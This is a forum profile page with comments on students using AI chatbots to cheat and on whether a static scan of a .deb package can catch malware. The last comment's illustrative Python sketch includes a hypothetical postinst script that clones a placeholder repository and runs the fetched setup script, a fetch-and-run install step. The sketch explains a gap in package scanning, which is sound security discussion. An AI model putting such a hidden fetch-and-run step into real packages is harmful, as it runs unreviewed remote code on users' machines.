• 0 Posts
  • 7 Comments
Joined 1 year ago
Cake day: May 18th, 2024

  • This is very insightful and provides good perspective.

    If I boil it down, the takeaway is that GPT is enough to get through the fundamentals of student material, so students can fake competence in the subject right up to the cliff they fall off at the test.
    This ultimately isn’t preparing them for the world, and it’s nearly impossible to catch until it’s too late. The pass-or-fail options aren’t helping either, because neither really represents the student’s best interests.

    The call to ban it in schools is the only lever we can grasp, because every other KNOWN option has been tried or assessed.


  • In some regard I don’t think it should be considered cheating. Don’t beat me up yet, I’m old and think AI sucks at most things.

    AI typically outputs crap. So why does this use of a new and widely available tech get called out differently?

    Using Google (in the “don’t be evil” timeframe) wasn’t cheating when open-book tests were permitted. Using the textbook was cheating on a closed-book test. In some cases, using a calculator was cheating.

    Is it cheating if you write a paper completely on your own and use the spell check and grammar check within Word? What if a Grammarly-type extension is used? It’s a slippery slope that advances with technology.

    I remember tests and assignments that were designed to make cheating harder: “show your work” for math-type problems, and quizzes and short essays that make demonstrating the subject matter necessary.

    Why doesn’t the education environment adapt to this? For writing assignments, maybe they need to be submitted with revision history so the teacher can see it wasn’t all done in one go via an LLM.

    The quick-answer responses are somewhat like using Wikipedia for a school paper. Don’t cite Wikipedia, and don’t use the generated text for anything but a base understanding of the topic. Then go use all the sources it provided to actually do the assignment.




    Does this work? I would think scanning a *.package would only assess that content. Wouldn’t something malicious more likely be in code or a dependency it could call via some form of GET request? The .deb package itself could be completely “safe” until it calls a `git clone <URL>` to then run something malicious.

    I think this would be more likely to work for AppImage or Flatpak, though the same approach could compromise the validity of the scan. Am I thinking too hard, or did I just miss the point?
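    A quick way to see the gap described above: a scanner that only inspects the files shipped inside the package has nothing to flag when the actual payload is only pulled down at install time. This is a toy Python sketch, with made-up “known bad” signatures and a hypothetical postinst script; the URL is a placeholder, not a real repo.

```python
# Toy sketch of why a static package scan can miss runtime-fetched payloads.
# All names, patterns, and the URL here are hypothetical, for illustration only.
BAD_PATTERNS = ["rm -rf /", "curl | sh"]  # made-up "known bad" signatures

# Hypothetical postinst maintainer script inside an otherwise "clean" .deb:
POSTINST = """#!/bin/sh
git clone https://example.com/payload.git /tmp/payload  # runs at install time
/tmp/payload/setup.sh
"""

def static_scan(file_text: str) -> list[str]:
    """Return the known-bad patterns found in the file's own contents."""
    return [p for p in BAD_PATTERNS if p in file_text]

# The scan finds nothing, because the payload only exists after install.
print(static_scan(POSTINST))  # prints []
```

    The package content itself never matches a signature; the malicious code arrives only after any pre-install scan has already passed.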